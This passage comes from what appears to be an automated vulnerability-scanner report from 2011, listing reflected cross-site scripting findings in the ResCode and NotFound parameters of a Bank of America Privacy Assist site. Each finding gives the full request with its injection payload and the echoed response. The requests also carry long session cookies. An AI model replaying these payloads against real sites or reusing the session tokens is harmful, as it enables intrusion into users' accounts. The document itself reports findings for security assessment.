mbox=check#true#1317908711|session#1317908650691-331415#1317910511; state=CT; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1317909171194; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; throttle_value=72; cmRS=&t1=1317909328081&t2=1317909332052&t3=1317909367524&lti=1317909367524&ln=Log_into_your_Bank_of_America_Privacy_Assist_online_account_Login&hr=javascript%3ASubmit&fti=1317909367519&fn=InsContentProtectPrivAsstLogin_frmLogon%3A0%3B&ac=0:S&fd=0%3A14%3AtxtUserID%3B0%3A15%3AtxtPassword%3B&uer=&fu=https%3A//privacyassist.bankofamerica.com/Pages/Asp/IN_PostLogon.asp&pi=Ins%3AContent%3AProtect%3APrivAsst%3BLogin&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34482
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:02:37 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Sign In</title>

<meta name="description" content="The s
...[SNIP]...
<!--
                           var strHref = 'https://' + 'privacyassist.bankofamerica.com' + '/pages/english/in_activation.asp' + '?FailureLogon=WrongUserID&ResCode=-34d9bf2'-alert(1)-'304d6ee0574';
                           strHref = strHref.toLowerCase()
                           if (strHref.indexOf('lm_fraudprotect') < 0 && strHref.indexOf('lm_cardregistry') < 0 && strHref.indexOf('lm_creditreport') < 0 )
                           {
                           var
...[SNIP]...

1.17. https://privacyassist.bankofamerica.com/Pages/English/IN_Activation.asp [ResCode parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages/English/IN_Activation.asp

Issue detail

The value of the ResCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa5d7"><a>b4d184f3fcd was submitted in the ResCode parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Pages/English/IN_Activation.asp?FailureLogon=WrongUserID&ResCode=-34aa5d7"><a>b4d184f3fcd HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; state=CT; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1317909171194; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; throttle_value=72; cmRS=&t1=1317909328081&t2=1317909332052&t3=1317909367524&lti=1317909367524&ln=Log_into_your_Bank_of_America_Privacy_Assist_online_account_Login&hr=javascript%3ASubmit&fti=1317909367519&fn=InsContentProtectPrivAsstLogin_frmLogon%3A0%3B&ac=0:S&fd=0%3A14%3AtxtUserID%3B0%3A15%3AtxtPassword%3B&uer=&fu=https%3A//privacyassist.bankofamerica.com/Pages/Asp/IN_PostLogon.asp&pi=Ins%3AContent%3AProtect%3APrivAsst%3BLogin&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34533
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:01:32 GMT

   <script type="text/javascript">
       alert ("Special Characters are not allowed.");
       location.href = "http://www.bankofamerica.com";
   </script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Tr
...[SNIP]...
<a class="menu" title="Home" name="Home_Header_Login.asp" href="https://privacyassist.bankofamerica.com/home.asp?FailureLogon=WrongUserID&ResCode=-34aa5d7"><a>b4d184f3fcd">
...[SNIP]...

1.18. https://privacyassist.bankofamerica.com/Pages/English/IN_Activation.asp [ResCode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages/English/IN_Activation.asp

Issue detail

The value of the ResCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1b08"-alert(1)-"fba03799c1a was submitted in the ResCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Pages/English/IN_Activation.asp?FailureLogon=WrongUserID&ResCode=-34f1b08"-alert(1)-"fba03799c1a HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; state=CT; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1317909171194; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; throttle_value=72; cmRS=&t1=1317909328081&t2=1317909332052&t3=1317909367524&lti=1317909367524&ln=Log_into_your_Bank_of_America_Privacy_Assist_online_account_Login&hr=javascript%3ASubmit&fti=1317909367519&fn=InsContentProtectPrivAsstLogin_frmLogon%3A0%3B&ac=0:S&fd=0%3A14%3AtxtUserID%3B0%3A15%3AtxtPassword%3B&uer=&fu=https%3A//privacyassist.bankofamerica.com/Pages/Asp/IN_PostLogon.asp&pi=Ins%3AContent%3AProtect%3APrivAsst%3BLogin&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34482
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:02:25 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Sign In</title>

<meta name="description" content="The s
...[SNIP]...
<!--
function GoPage(page)
{
var sSQuery = "FailureLogon=WrongUserID&ResCode=-34f1b08"-alert(1)-"fba03799c1a";

if ( page == "elert" )
{
   top.location.href= 'https://idprotect.bankofamerica.com/code.asp?Fr=Re'
   //top.location.href= 'https://test8.intersections.com/code.asp?Fr=Re'
}
else
{
...[SNIP]...

1.19. https://privacyassist.bankofamerica.com/Pages/English/IN_IForgotMyUserID.asp [NotFound parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages/English/IN_IForgotMyUserID.asp

Issue detail

The value of the NotFound request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62e5"><a>2d3d4f366f1 was submitted in the NotFound parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Pages/English/IN_IForgotMyUserID.asp?NotFound=Yesc62e5"><a>2d3d4f366f1 HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages/English/IN_iforgotmyuserid.asp?FailureLogon=WrongUserID&ResCode=-34
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; cmRS=&t1=1317910589971&t2=1317910592671&t3=1317910671003&t4=1317910588513&lti=1317910671003&ln=Submit_Forgotten_User_ID_or_Password_Request_IN_IForgotMyUserID&hr=javascript%3ASubmit%20Forgotten%20User%20ID%20or%20Password%20Request&fti=1317910670997&fn=InsToolProtectionPrivAsstForgotUsrIDPassEnterData_frmForgottenUserID%3A0%3B&ac=0:S&fd=0%3A3%3AtxtLName%3B0%3A4%3AtxtSSN%3B0%3A5%3AtxtZipCode%3B&uer=&fu=https%3A//privacyassist.bankofamerica.com/Pages/Asp/IN_ForgottenUserID.asp&pi=Ins%3ATool%3AProtection%3APrivAsst%3AForgotUsrIDPass%3BEnterData&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22859
Content-Type: text/html
Expires: Thu, 06 Oct 2011 14:24:27 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:24:27 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<HEAD>

<title>Bank of America | Privacy Assist | Forgotten User ID or Password</title>

<meta name="descrip
...[SNIP]...
<a class="menu" title="Home" name="Home_Header_IN_IForgotMyUserID.asp" href="https://privacyassist.bankofamerica.com/home.asp?NotFound=Yesc62e5"><a>2d3d4f366f1">
...[SNIP]...

1.20. https://privacyassist.bankofamerica.com/Pages/English/IN_IForgotMyUserID.asp [NotFound parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages/English/IN_IForgotMyUserID.asp

Issue detail

The value of the NotFound request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1cbc"-alert(1)-"f10bb05ef0e was submitted in the NotFound parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Pages/English/IN_IForgotMyUserID.asp?NotFound=Yese1cbc"-alert(1)-"f10bb05ef0e HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages/English/IN_iforgotmyuserid.asp?FailureLogon=WrongUserID&ResCode=-34
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; 